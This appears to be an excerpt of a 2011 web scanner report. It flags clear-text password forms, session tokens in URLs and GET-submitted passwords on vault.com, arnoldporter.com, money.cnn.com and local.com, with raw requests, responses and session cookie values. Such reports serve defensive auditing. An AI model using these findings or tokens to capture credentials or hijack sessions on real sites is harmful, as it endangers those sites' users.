GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS83VTBoZjMwMTYwMDAxLzI3MDIxMy9saQ!!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

5.18. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form method="get" action="/wps/portal/usa/membership">
                   
                   <input type="hidden" name="lastPage" value="/wps/portal/usa/rankings/individual" />
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

5.19. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS82VTBoZjMwMTYwMDAyLzI3MDIxNC9saQ!!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/rankings/individual"/>
...[SNIP]...
</label>
   <input id="UserPassword" name="password" type="password" value="" onfocus="clearField(this);" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="clearField(this);" />
   <label for="zip-code">
...[SNIP]...

6. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&amp;action=view&amp;id=420&amp;CFID=9488352&amp;CFTOKEN=58883300">Justin Antonipillai</a>
...[SNIP]...
</em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a>
...[SNIP]...
</em> named Arnold &amp; Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&amp;action=view&amp;id=29&amp;CFID=3285218&amp;CFTOKEN=60209382">Deborah Feinstein</a>
...[SNIP]...
</em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a>
...[SNIP]...
<p>Attorney General Eric Holder presented Arnold &amp; Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&amp;action=view&amp;id=424&amp;CFID=1875550&amp;CFTOKEN=71164531">Robert Pitofsky</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&amp;action=view&amp;id=5423&amp;CFID=476026&amp;CFTOKEN=73240865">Ginger Dreger</a>
...[SNIP]...
</em> named Arnold &amp; Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=417833&amp;CFTOKEN=96803455">William Baer</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=8038589&amp;CFTOKEN=38448975">William Baer</a>
...[SNIP]...
</a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&amp;action=view&amp;id=189&amp;CFID=8038589&amp;CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&amp;action=view&amp;id=716&amp;CFID=8038589&amp;CFTOKEN=38448975">John D. Hawke Jr.</a>
...[SNIP]...
ife sciences: regulatory, compliance &amp; competition; and product liability: mainly defendant; and was ranked as a "Leading Firm" for intellectual property and media &amp; entertainment: publishing. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&amp;action=view&amp;id=457&amp;CFID=8038589&amp;CFTOKEN=38448975">Ian Dodds-Smith</a>
...[SNIP]...
</a> was ranked for life sciences and product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=TsangLincoln&amp;action=view&amp;id=553&amp;CFID=8038589&amp;CFTOKEN=38448975">Lincoln Tsang</a> was ranked for life sciences; <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&amp;action=view&amp;id=320&amp;CFID=8038589&amp;CFTOKEN=38448975">Ian Kirby</a>
...[SNIP]...
</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=DriverHElizabeth&amp;action=view&amp;id=435&amp;CFID=8038589&amp;CFTOKEN=38448975">Elizabeth Driver</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=BoreJacqueline&amp;action=view&amp;id=799&amp;CFID=8038589&amp;CFTOKEN=38448975">Jacqueline Bore</a> were ranked for product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&amp;action=view&amp;id=277&amp;CFID=8038589&amp;CFTOKEN=38448975">Tim Frazer</a> was ranked for competition/European Law; <a href="http://www.arnoldporter.com/professionals.cfm?u=ClintonDavisHenry&amp;action=view&amp;id=5083&amp;CFID=8038589&amp;CFTOKEN=38448975">Henry Clinton-Davis</a> was ranked for employment; and <a href="http://www.arnoldporter.com/professionals.cfm?u=WillcocksJeremy&amp;action=view&amp;id=378&amp;CFID=8038589&amp;CFTOKEN=38448975">Jeremy Willcocks</a>
...[SNIP]...
</em> In terms of practice areas, the group certainly enjoys a diverse caseload, although it is in the field of investment arbitration that it earns the most significant praise." The publication named <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=793238&CFTOKEN=19009463">Paolo Di Rosa</a> as a "Leading Individual" for International Arbitration and also singled out <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=KalickiJeanEngelmayer&action=view&id=254&CFID=793238&CFTOKEN=19009463">Jean Kalicki</a>
...[SNIP]...
</em> 2009 named firm Chair <a href="http://www.arnoldporter.com/professionals.cfm?u=MilchThomasH&action=view&id=79&CFID=793238&CFTOKEN=19009463">Thomas Milch</a> and senior counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=793238&CFTOKEN=19009463">Michael Gerrard</a> on its "Most Highly Regarded Individuals - Global" list. Arnold & Porter was the only firm to have two individuals ranked on the list of ten international lawyers. Partners <a href="http://www.arnoldporter.com/professionals.cfm?u=BilesBlakeA&action=view&id=8&CFID=793238&CFTOKEN=19009463">Blake Biles</a>
...[SNIP]...
</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=MartelJonathan&action=view&id=74&CFID=793238&CFTOKEN=19009463">Jonathan Martel</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a>
...[SNIP]...
ual property, media and entertainment, and pharmaceuticals and biotechnology); and transport (rail). The firm was also ranked as a "US firm in London" for Dual US/UK law capability: 25-50 fee-earners. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=793238&CFTOKEN=19009463">Ian Dodds-Smith</a> was named a "leading individual" for product liability and pharmaceuticals & biotechnology; and <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a>
...[SNIP]...
</em> "Top Washington Lawyers" feature, published in its September 18-24, 2009 edition. <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a>
...[SNIP]...
</a>; <a href="http://www.arnoldporter.com/professionals.cfm?u=KahnSarahE&action=view&id=99&CFID=793238&CFTOKEN=19009463">Sarah Kahn</a> was named a winner for Corporate M&A; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerschDavidP&action=view&id=37&CFID=793238&CFTOKEN=19009463">David Gersch</a>
...[SNIP]...
</a> was named a winner for Technology Transactions; <a href="http://www.arnoldporter.com/professionals.cfm?u=RifkindAmyB&action=view&id=231&CFID=793238&CFTOKEN=19009463">Amy Rifkind</a> was named as a winner for Real Estate Transactions; and <a href="http://www.arnoldporter.com/professionals.cfm?u=SotskyLester&action=view&id=111&CFID=793238&CFTOKEN=19009463">Les Sotsky</a>
...[SNIP]...
<p><a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&amp;action=view&amp;id=29&amp;CFID=793238&amp;CFTOKEN=19009463">Deborah Feinstein</a>
...[SNIP]...
</a> (Brussels) and <a href="http://www.arnoldporter.com/professionals.cfm?u=VanKerckhoveMarleen&amp;action=view&amp;id=616&amp;CFID=793238&amp;CFTOKEN=19009463">Marleen Van Kerckhove</a>
...[SNIP]...
<p>The New York City Bar Association's (NYCBA) has named <a href="http://www.arnoldporter.com/professionals.cfm?u=FucciFrederickR&amp;action=view&amp;id=4980&amp;CFID=793238&amp;CFTOKEN=19009463">Frederick R. Fucci</a>
...[SNIP]...
</em> 2009 list: <a href="http://www.arnoldporter.com/professionals.cfm?u=GargantaAngelA&action=view&id=5055&CFID=793238&CFTOKEN=19009463">Angel Garganta</a> (business litigation, civil litigation defense, and banking), <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a> (environmental), <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a>
...[SNIP]...
</a> (intellectual property litigation, civil rights/first amendment, and alternative dispute resolution). <a href="http://www.arnoldporter.com/professionals.cfm?u=ChaninRachelL&action=view&id=5095&CFID=793238&CFTOKEN=19009463">Rachel Chanin</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&amp;action=view&amp;id=716&amp;CFID=793238&amp;CFTOKEN=19009463">John D. Hawke, Jr.</a>
...[SNIP]...
<p>The Internal Revenue Service's Advisory Committee on Tax Exempt and Government Entities (ACT) named <a href="http://www.arnoldporter.com/professionals.cfm?u=JosephJamesP&amp;action=view&amp;id=53&amp;CFID=793238&amp;CFTOKEN=19009463">James Joseph</a>
...[SNIP]...
p>Arnold &amp; Porter was recommended in England for IP: commercial IP and IP: non-patent litigation; was recommended in Washington, DC for IP; and was recognized in England for IP: patent litigation. <a href="http://www.arnoldporter.com/professionals.cfm?u=DickinsonRichard&amp;action=view&amp;id=5050&amp;CFID=793238&amp;CFTOKEN=19009463">Richard Dickinson</a> was recognized for IP: commercial IP (England); <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&amp;action=view&amp;id=320&amp;CFID=793238&amp;CFTOKEN=19009463">Ian Kirby</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=JohnstonRonaldL&action=view&id=306&CFID=793238&CFTOKEN=19009463">Ronald Johnston</a>
...[SNIP]...
<p>The National Asian Pacific American Bar Association (NAPABA) named San Francisco partner <a href="http://www.arnoldporter.com/professionals.cfm?u=AgarwalMonty&amp;action=view&amp;id=5058&amp;CFID=793238&amp;CFTOKEN=19009463">Monty Agarwal</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MorrisSean&amp;action=view&amp;id=263&amp;CFID=793238&amp;CFTOKEN=19009463">Sean Morris</a>
...[SNIP]...
<p>The Executive Council of the Banking Law Committee of the Federal Bar Association awarded <a href="http://www.arnoldporter.com/attorneys.cfm?u=HawkeJohnDJr&amp;action=view&amp;id=716&amp;CFID=6662351&amp;CFTOKEN=25960794">John D. Hawke, Jr.</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=ColleyMarkD&amp;action=view&amp;id=913&amp;CFID=793238&amp;CFTOKEN=19009463">Mark Colley</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=GoodwinMichaelD&amp;action=view&amp;id=163&amp;CFID=793238&amp;CFTOKEN=19009463">Michael Goodwin</a>
...[SNIP]...
</em>awarded partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=793238&amp;CFTOKEN=19009463">William Baer</a>
...[SNIP]...
</em>named <a href="http://www.arnoldporter.com/professionals.cfm?u=GarrettRobertAlan&amp;action=view&amp;id=36&amp;CFID=793238&amp;CFTOKEN=19009463">Robert Garrett</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BlackburnJamesS&amp;action=view&amp;id=301&amp;CFID=793238&amp;CFTOKEN=19009463">James Blackburn</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MacdonaldTimothyR&amp;action=view&amp;id=279&amp;CFID=793238&amp;CFTOKEN=19009463">Timothy Macdonald</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/attorneys.cfm?u=QuinnJohnJ&amp;action=view&amp;id=225&amp;CFID=6160598&amp;CFTOKEN=81825356">John "Jack" Quinn</a>
...[SNIP]...

7. Password field submitted using GET method  previous  next
There are 5 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


7.1. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start login -->
           <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input class="" id="passwordinput" name="password" type="password">
               <div id="cnnConnectLoginErrors" style="display: none;">
...[SNIP]...

7.2. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start reset password -->    
           <form id="cnnConnectFormReset" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input type="password" id="new_password" name="newPassword">
               <div id="cnnConnectResetErrors">
...[SNIP]...

7.3. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start registration -->    
           <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input id="signup_password" name="password" maxlength="10" type="password" />
               <span class="fieldTip">
...[SNIP]...

7.4. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 72932
Date: Wed, 19 Jan 2011 16:52:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ttvxzdezqtxibt55l2f5dv45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=7504aafd-2c5e-48d0-90d2-473f5c5bc81d&expdate=634336159361775734&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:16 GMT; path=/
Content-Length: 72932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.5. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form method="get" action="/wps/portal/usa/membership">
                   
                   <input type="hidden" name="lastPage" value="/wps/portal/usa/rankings/individual" />
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

